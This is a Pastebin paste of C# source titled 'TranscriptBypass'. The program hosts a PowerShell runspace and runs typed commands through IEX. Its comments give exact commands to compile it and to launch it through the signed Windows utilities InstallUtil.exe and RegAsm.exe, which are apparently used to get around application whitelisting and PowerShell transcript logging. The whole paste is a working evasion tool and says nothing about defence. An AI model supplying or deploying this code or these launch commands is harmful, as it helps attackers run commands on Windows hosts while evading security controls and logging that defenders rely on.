API tools faq
paste
Guest User

Untitled

a guest
Jul 18th, 2018
90
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.99 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Collections.ObjectModel;
  3. using System.Management.Automation;
  4. using System.Management.Automation.Runspaces;
  5.  
  6. namespace TranscriptBypass
  7. {
  8. // Compiling with CSC.exe v4.0.30319 or v3.5
  9. // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
  10. // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
  11.  
  12. // Running via InstallUtil.exe
  13. // C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\posh.exe
  14.  
  15. // Compiling with CSC.exe v4.0.30319 or v3.5 for use with regasm.exe
  16. // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\Temp\posh.dll C:\Temp\posh.cs /reference:System.Management.Automation.dll
  17. // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /target:library /out:c:\temp\posh.dll C:\temp\posh.cs /reference:System.Management.Automation.dll
  18.  
  19. // Running via RegAsm.exe
  20. // C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\temp\posh.dll
  21.  
  22. public class Program
  23. {
  24. public static Runspace newrunspace;
  25. public static void startrunspace()
  26. {
  27. newrunspace = RunspaceFactory.CreateRunspace();
  28. newrunspace.Open();
  29. var cmd = new System.Management.Automation.PSVariable("c");
  30. newrunspace.SessionStateProxy.PSVariable.Set(cmd);
  31. var output = new System.Management.Automation.PSVariable("o");
  32. newrunspace.SessionStateProxy.PSVariable.Set(output);
  33.  
  34. }
  35. public static string InvokeAutomation(string cmd)
  36. {
  37. RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
  38. Pipeline pipeline = newrunspace.CreatePipeline();
  39. newrunspace.SessionStateProxy.SetVariable("c", cmd);
  40. if (cmd == "$a;")
  41. {
  42. return "";
  43. }
  44. else
  45. {
  46. pipeline.Commands.AddScript("$o = IEX $c | Out-String");
  47. }
  48.  
  49. Collection<PSObject> results1 = pipeline.Invoke();
  50. object results2 = newrunspace.SessionStateProxy.GetVariable("o");
  51. return results2.ToString();
  52.  
  53. }
  54. public static void Main()
  55. {
  56. try
  57. {
  58. startrunspace();
  59. string ps = null;
  60. Console.Write("PS>");
  61. while (!String.IsNullOrEmpty(ps = "$a;" + Console.ReadLine().Trim()))
  62. {
  63. try
  64. {
  65. Console.WriteLine(InvokeAutomation(ps));
  66. }
  67. catch (Exception ex)
  68. {
  69. Console.Write(ex.Message);
  70. }
  71. Console.Write("PS>");
  72. }
  73. }
  74. catch
  75. {
  76. Main();
  77. }
  78. }
  79. }
  80. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!